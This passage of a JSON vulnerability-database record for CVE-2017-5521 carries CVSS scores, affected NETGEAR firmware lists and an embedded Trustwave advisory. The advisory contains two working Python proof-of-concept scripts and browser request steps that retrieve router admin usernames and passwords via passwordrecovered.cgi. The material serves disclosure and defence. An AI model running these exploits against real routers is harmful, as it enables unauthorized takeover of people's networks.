"vendor": "net gear", "version": "1.0.1.40_1.0.68" }, { "model": "wnr1000v3", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "wnr1000v3", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.2.68_60.0.93" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "BID", "id": "95457" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:r6300_firmware:1.0.2.78_1.0.58:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:vegn2610_firmware:1.0.0.36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:vegn2610:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:ac1450_firmware:1.0.0.34_10.0.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wnr1000v3_firmware:1.0.2.68_60.0.93:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wnr1000v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr3700v3_firmware:1.0.0.40_1.0.32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr3700v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4000_firmware:1.0.2.4_9.1.86:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:wndr4500_firmware:1.0.1.44_1.0.73:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:wndr4500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6400_firmware:1.0.0.44:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6220_firmware:1.0.0.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6300_firmware:1.0.0.96:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:d6300b_firmware:1.0.0.40:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:netgear:dgn2200bv4_firmware:1.0.0.68:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:netgear:dgn2200bv4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2017-5521" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The vendor reported this issue.", "sources": [ { "db": "BID", "id": "95457" } ], "trust": 0.3 }, "cve": "CVE-2017-5521", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2017-5521", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2017-00835", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-113724", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.1, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2017-5521", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2017-5521", "trust": 1.8, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-00835", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201701-454", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-113724", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2017-5521", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear\u0027s wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. \nSuccessful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003:\nMultiple Vulnerabilities in NETGEAR Routers\n \nPublished: 01/30/2017\nVersion: 1.0\n \nVendor: NETGEAR (http://www.netgear.com/)\nProduct: Multiple products\n \nFinding 1: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\n# D6400 V1.0.0.34_1.3.34\n# D6400 V1.0.0.38_1.1.38\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.30_10.0.73\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.26_1.0.41\n# R8500 V1.0.0.56_1.0.28\n# R8500 V1.0.0.20_1.0.11\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.29_1.0.29\n# VEGN2610 V1.0.0.27_1.0.27\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.42_1.0.25\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\n# WN3100RP V1.0.0.6_1.0.12\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nProduct description:\nMultiple Netgear Routers\n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. \nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser:\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\n \n## netgore.py\nimport sys\nimport requests\n \n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage - get token\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\ntoken = scrape(r.text, \u0027unauth.cgi?id=\u0027, \u0027\\\"\u0027)\nif token == \u0027i_dont_speak_english\u0027:\n print \"not vulnerable\"\n sys.exit(0)\nprint \"token found: \" + token\n#2nd stage - pass the token - get the password\nurl = url + \u0027passwordrecovered.cgi?id=\u0027 + token\nr = requests.post(url, verify=False)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable becuse password recovery IS set\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \nFinding 2: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6300 V1.0.0.96_1.1.96 (Latest)\n# D6300B V1.0.0.36_1.0.36\n# D6300B V1.0.0.32_1.0.32\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\n# DGN2200v4 V1.0.0.66_1.0.66\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.56_1.0.43 (Latest)\n# R6200 V1.0.1.52_1.0.41\n# R6200 V1.0.1.48_1.0.37\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\n# R6200v2 V1.0.1.20_1.0.18\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\n# R6250 V1.0.1.84_1.0.78 \n# R6300 V1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\n# R6700 V1.0.0.26_10.0.26 (Latest)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R7000 V1.0.4.30_1.1.67\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\n# R7900 V1.0.0.10_10.0.7\n# R7900 V1.0.0.8_10.0.5\n# R7900 V1.0.0.6_10.0.4\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.30_1.0.43\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.27_1.0.27\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\n# VEVG2660 V1.0.0.23_1.0.23\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\n# WNDR3400v3 V1.0.1.2_1.0.51\n# WNDR3400v3 V1.0.0.22_1.0.29\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.50_1.0.30\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\n# WNR3500Lv2 V1.2.0.32_40.0.74\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. \n \nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password. \nThe issue occurs after every reboot of the router. \n \nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser:\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\n \n## netgore2.py\nimport sys\nimport requests\n \ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage\nip = sys.argv[1]\nport = sys.argv[2]\nurl = \u0027http://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\ntry:\n r = requests.get(url)\nexcept:\n url = \u0027https://\u0027 + ip + \u0027:\u0027 + port + \u0027/\u0027\n r = requests.get(url, verify=False)\nmodel = r.headers.get(\u0027WWW-Authenticate\u0027)\nif model is not None:\n print \"Attcking: \" + model[13:-1]\nelse:\n print \"not a netgear router\"\n sys.exit(0)\n#2nd stage\nurl = url + \u0027passwordrecovered.cgi?id=get_rekt\u0027\ntry:\n r = requests.post(url, verify=False)\nexcept:\n print \"not vulnerable router\"\n sys.exit(0)\n#profit\nif r.text.find(\u0027left\\\"\u003e\u0027) != -1:\n username = (repr(scrape(r.text, \u0027Router Admin Username\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n username = scrape(username, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n password = (repr(scrape(r.text, \u0027Router Admin Password\u003c/td\u003e\u0027, \u0027\u003c/td\u003e\u0027)))\n password = scrape(password, \u0027\u003e\u0027, \u0027\\\u0027\u0027)\n if username == \"i_dont_speak_english\":\n username = (scrape(r.text[r.text.find(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\n password = (scrape(r.text[r.text.rfind(\u0027left\\\"\u003e\u0027):-1], \u0027left\\\"\u003e\u0027, \u0027\u003c/td\u003e\u0027))\nelse:\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\n sys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"\u0026#35;\",\"#\")\npassword = password.replace(\"\u0026\",\"\u0026\")\nprint \"user: \" + username\nprint \"pass: \" + password\n \n================================\nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \n \nRemediation Steps:\nPlease see NETGEAR\u0027s KBA for list of firmware patches for various models. \n \nRevision History:\n04/06/2016 - Vulnerability disclosed to vendor\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\n05/18/2016 - Request for update; no response\n07/14/2016 - Request for update\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\n10/17/2016 - Request for update\n12/15/2016 - Notice of intent to publish advisories\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\n01/30/2017 - Advisory published\n \n \nReferences\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\n2. https://www.exploit-db.com/exploits/32883/\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n \n \nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n \nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n \nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply", "sources": [ { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "BID", "id": "95457" }, { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "PACKETSTORM", "id": "140844" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-113724", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41205", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-5521", "trust": 3.6 }, { "db": "BID", "id": "95457", "trust": 2.9 }, { "db": "EXPLOIT-DB", "id": "41205", "trust": 1.2 }, { "db": "JVNDB", "id": "JVNDB-2017-001263", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201701-454", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2017-00835", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "140844", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-92639", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-113724", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-5521", "trust": 0.1 }, { "db": "EXPLOIT-DB", "id": "32883", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULHUB", "id": "VHN-113724" }, { "db": "VULMON", "id": "CVE-2017-5521" }, { "db": "BID", "id": "95457" }, { "db": "JVNDB", "id": "JVNDB-2017-001263" }, { "db": "PACKETSTORM", "id": "140844" }, { "db": "NVD", "id": "CVE-2017-5521" }, { "db": "CNNVD", "id": "CNNVD-201701-454" } ] }, "id": "VAR-201701-0766", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" }, { "db": "VULHUB", "id": "VHN-113724" } ], "trust": 1.2250386052380953 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-00835" } ] }, "last_update_date": "2023-12-18T12:20:10.468000Z", "patch": { "@context": { "@vocab": 